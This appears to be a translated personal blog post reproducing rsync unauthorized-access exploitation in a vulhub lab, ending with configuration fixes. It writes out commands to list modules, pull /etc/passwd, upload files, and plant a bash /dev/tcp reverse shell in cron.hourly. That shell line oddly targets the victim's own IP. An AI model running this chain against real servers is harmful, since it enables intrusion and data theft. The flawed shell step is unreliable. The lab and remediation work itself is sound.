xfeng

xfeng

健身 技术 阅读 思考 记录
tg_channel
tg_channel
github
bilibili
tg_channel
HomePortfoliosArchivesAbout

rsync Unauthorized Access Vulnerability Reproduction

#未授权访问#漏洞复现129
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses the unauthorized access vulnerability in rsync, a commonly used Linux application for file synchronization. It explains the potential risks of unauthorized access and provides information on rsync configuration files, common commands, vulnerability reproduction steps, and how to fix the vulnerability. It also includes a reference video for further information.

1. Vulnerability Introduction#

rsync is a remote data synchronization tool for Linux/Unix that can synchronize files and directories on the local and remote hosts. It runs on port 873 by default. Due to improper configuration, anyone can have unauthorized access to rsync, allowing them to upload local files and download server files.

The main risks associated with unauthorized access to rsync are:

  • Serious information leakage
  • Uploading script backdoor files and remote command execution

2. rsync Configuration File#

image

ParameterDescription
uidThis parameter specifies the username or user ID for file transfers between this module
gidThis parameter specifies one or more group names/IDs to be used when accessing the module
use chrootIf set to true, rsync will chroot to the directory specified by the path parameter before transferring files. This provides additional security protection, but requires root privileges and cannot back up directory files pointed to by symbolic links outside of the path
max connectionsSpecifies the maximum number of concurrent connections for this module to protect the server. Connection requests exceeding the limit will be told to try again later
syslog facilitySpecifies the message level when rsync sends log messages to syslog
pid fileThe rsync daemon writes its PID to the specified file
log fileSpecifies the log file for the rsync daemon, without sending the log to syslog
pathSpecifies the synchronization path for the current module on the rsync server, this parameter must be specified
commentSpecifies a description for the module, which, along with the module name, is displayed to the client when the client connects and gets the module list
read onlySpecifies whether clients are allowed to upload files. If set to true, uploading is not allowed; if set to false and the server directory has read and write permissions, uploading is allowed
auth usersSpecifies the authentication username, it can be unset, and if unset, no password is required. Setting it provides higher security
secrets fileSpecifies the password file, which must be set if authentication users are set, and the password permission should be set to 400
hosts allowSets the hosts allowed to access, it can be a network segment, and multiple IP addresses are separated by spaces

3. Common rsync Commands#

-a, --archive	Archive mode, indicates recursive file transfer and preserves all file attributes, equivalent to -rlptgoD (note that -H is not included)
-v, --verbose	Verbose output mode
-r, --recursive	Process directories recursively
-l, --links	Preserve symbolic links, with this parameter, the synchronized files will retain their previous symbolic link attributes
-H, --hard-links	Preserve hard links
-p, --perms	Preserve file permissions
-t, --times	Preserve file time information
-g, --group	Preserve file group information
-o, --owner	Preserve file owner information (super-user only)
-D	Preserve device and special files (super-user only)
-e, --rsh=COMMAND	Specify the shell program to replace rsh
-z, --compress	Compress files during transfer
--stats	Provide transfer status for certain files
--progress	Display transfer progress during transfer
--timeout=TIME	IP timeout during synchronization, in seconds
--exclude=PATTERN	Specify files or subdirectories to be filtered out during synchronization (i.e., not synchronized), followed by the names of individual files or subdirectories that do not need to be synchronized (without paths). To filter multiple files or subdirectories, use multiple --exclude
--exclude-from=FILE	Specify files or subdirectories to be filtered out during synchronization, followed by the file (e.g., /root/exclue.txt), and then put the files and subdirectories that do not need to be synchronized into /root/exclue.txt
--include=PATTERN	Specify file matching patterns to be transferred
--include-from=FILE	Read inclusion rules from FILE
--copy-unsafe-links	Copy link files that point to directories outside the SRC path tree
--safe-links	Ignore link files that point to directories outside the SRC path tree (default)
--existing	Only update files that already exist on the receiving end, without backing up newly created files
--ignore-existing	Ignore files that already exist on the receiving end and only back up newly created files
-b, --backup	When changes occur, back up old versions of files in the target directory
--backup-dir=DIR	Used in conjunction with -b, stores backed-up files in the DIR directory
--link-dest=DIR	Create hard link files based on DIR when files have not changed
--delete	Delete excess files in the target directory that do not exist in the source directory. This is the best choice for rsync to perform incremental full backups!!!!!!
--delete-before	The receiver performs deletion operations before output. That is, all files in the target directory are deleted first, and then the source directory files are copied over. This is the solution for rsync to keep the target directory consistent with the source directory!!!!!
--delete-after	Compare after the synchronization operation and delete excess files in the target directory that do not exist in the source directory
--delete-excluded	Delete files excluded by this option in the target directory
--ignore-errors	Delete even if I/O errors occur
--partial	Keep files that have not been completely transferred due to unforeseen circumstances, in order to speed up subsequent retransfers
-P	Equivalent to --partial --progress
--delay-updates	Save files being updated to a temporary directory (default is ".~tmp~") before updating the target file after transmission is complete
-q, --quiet	Simplified output mode
-h, --human-readable	Use human-readable units for file sizes (e.g., K, M, etc.)
-n, --dry-run	Display which files will be transferred
--list-only	List files without copying
--rsyncpath=PROGRAM	Specify the path to the rsync command on the remote server
--password-file=FILE	Read the password from FILE to avoid entering the password on the terminal, usually used when connecting to the rsync server in cron
--version	Print version information
--port=PORT	Specify an alternate rsync server port
--log-format=formAT	Specify the log file format
--password-file=FILE	Get the password from FILE
--bwlimit=KBPS	Limit I/O bandwidth, KBytes per second
--help	Display help information
-4, --ipv4	Use IPv4
-6, --ipv6	Use IPv6

4. Vulnerability Reproduction#

4.1 Setting up the Target Environment#

Use the vulhub target environment to reproduce the vulnerability

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip 

unzip vulhub-master.zip

cd vulhub-master/rsync/common
sudo docker-compose up -d

4.2 Scanning the Target System for Open rsync Services#

Use nmap to scan whether the target system has open rsync services and perform vulnerability scanning

sudo nmap -p 873 192.168.110.128

sudo nmap -p 873 --script rsync-list-modules 192.168.110.128

4.3 Listing the Synchronization Directories on the Target Server#

Use the rsync command to list and view the synchronization directories on the server

rsync 192.168.110.128::

rsync rsync://192.168.110.128:873/src

rsync 192.168.110.128::src

4.4 Arbitrary File Download#

You can download the /etc/passwd file

sudo rsync -av 192.168.110.128::src/etc/passwd ./

4.5 Arbitrary File Writing#

Upload a file to the server

sudo touch 1.txt && sudo chmod 777 1.txt && echo "test" >> 1.txt

sudo rsync -av 1.txt rsync://192.168.110.128:873/src/1.txt

rsync rsync://192.168.110.128:873/src

4.6 Getting a shell using the arbitrary file writing and downloading functions#

sudo rsync rsync://192.168.110.128:873/src/etc/crontab ./


sudo touch shell && sudo chmod 777 shell && echo "/bin/bash -i >& /dev/tcp/192.168.110.128/8888" >> shell

rsync -av shell rsync://192.168.110.128:873/src/etc/cron.hourly

nc -lvp 8888

5. Vulnerability Fix#

  • Modify the default rsync configuration file /etc/rsyncd.conf and add or modify the following parameters:
    • Access control; set host allow to restrict the IP addresses allowed to access the host.
    • Permission control; set read only to make the module read-only.
    • Access authentication; set auth and secrets, so that the service can only be called after successful authentication.
    • Module hiding; set list to hide the module.

6. Reference Video#

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.